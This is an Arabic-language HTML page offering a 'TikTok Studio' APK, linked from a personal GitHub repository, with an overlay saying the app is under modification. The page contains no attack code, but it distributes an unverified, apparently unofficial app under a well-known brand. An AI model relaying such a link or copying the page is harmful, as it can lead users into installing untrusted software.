
<!DOCTYPE html>
<html lang="en">
  
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link rel="stylesheet" href="style.css" type="text/css" media="all" />
  
  <script src="script.js">
    // كود لمنع التمرير بشكل كامل (X و Y)
document.body.style.overflow = 'hidden';

// أو يمكنك استخدام هذا إذا أردت إعادة التحكم لاحقاً
function disableScroll() {
  document.body.style.overflow = 'hidden';
}

function enableScroll() {
  document.body.style.overflow = 'auto'; // أو 'scroll'
}

// استدعاء المنع
disableScroll();
  </script>
  

  
  <title>Download TikTok Studio</title>
  <style>
  
  
  body{
  margin: 0px;

  background: #2A37C1 url() 0 0 no-repeat;
}


#main{
  
}

#stop{
  position: absolute;
  top: 10%;
  left: 5%;
  width: 90%;
  height: 70%;
  z-index: 999;
  background:  #FFFFFFF5;
  border-radius: 20px;
  text-align: center;
  display: flex;
  justify-content: center;
  align-items: center;
}
  
  
  
  
  
    body {
      margin: 0;
      padding: 5px;
      
      font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
      background: linear-gradient(135deg, #000000, #1a1a1a);
      color: white;
      display: flex;
      align-items: center;
      justify-content: center;
     height: 90vh;
      flex-direction: column;
      text-align: center;
    }header {
  width: 99%;
  padding: 20px;
  background-color: #0f0f0f;
  box-shadow: 0 2px 10px rgba(255, 0, 80, 0.2);
  text-align: center;
}

header h1 {
  margin: 0;
  font-size: 1.8rem;
  color: #ff0050;
}

header span {
  color: #aaa;
  font-size: 0.9rem;
}

.card {
  background-color: #111;
  border-radius: 20px;
  padding: 40px;
  box-shadow: 0 0 25px rgba(255, 0, 102, 0.3);
  max-width: 99%;
}

.card img {
  width: 100px;
  height: auto;
  margin-bottom: 20px;
}

h2 {
  margin-bottom: 20px;
  font-size: 1.5rem;
}

p {
  margin-bottom: 30px;
  font-size: 1rem;
  color: #ccc;
}

button {
  background-color: #ff0050;
  border: none;
  border-radius: 30px;
  padding: 15px 30px;
  font-size: 1rem;
  color: white;
  cursor: pointer;
  transition: background-color 0.3s ease;
}

button:hover {
  background-color: #e60045;
}







  </style>
</head>
<body>
  <header>
    <h1>TikTok Studio</h1>
    <span>الإصدار: 1.0.0</span>
  </header>  
  <div class="card">
    <img src="https://raw.githubusercontent.com/menak8om/Data/refs/heads/main/ic_launcher.png" alt="TikTok Studio Logo" />
    <h2>تطبيق TikTok Studio</h2>
    <p>قم بتحميل تطبيق TikTok Studio الآن وابدأ في صناعة المحتوى بكل احترافية!</p>
    <button onclick="window.location.href='https://github.com/menak8om/Data/raw/refs/heads/main/tiktok2%20(1).apk'">تحميل التطبيق</button>
  </div>
  
  
  <div id="main">
    


    <div id="stop">
      
      
      <div class="">
        
      
      
 <p style="font-size: 17px; font-weight: 900; color: black; ">التطبيق  جاري التعديل لايمكن تحميله</p>
 
 
 <p style="color: black; font-weight: 400;">Editor Mina Shehata</p>
 </div>
 
  </div>
  
  
  
  
  </div>
  
  
  

  
  
  </body>
</html>
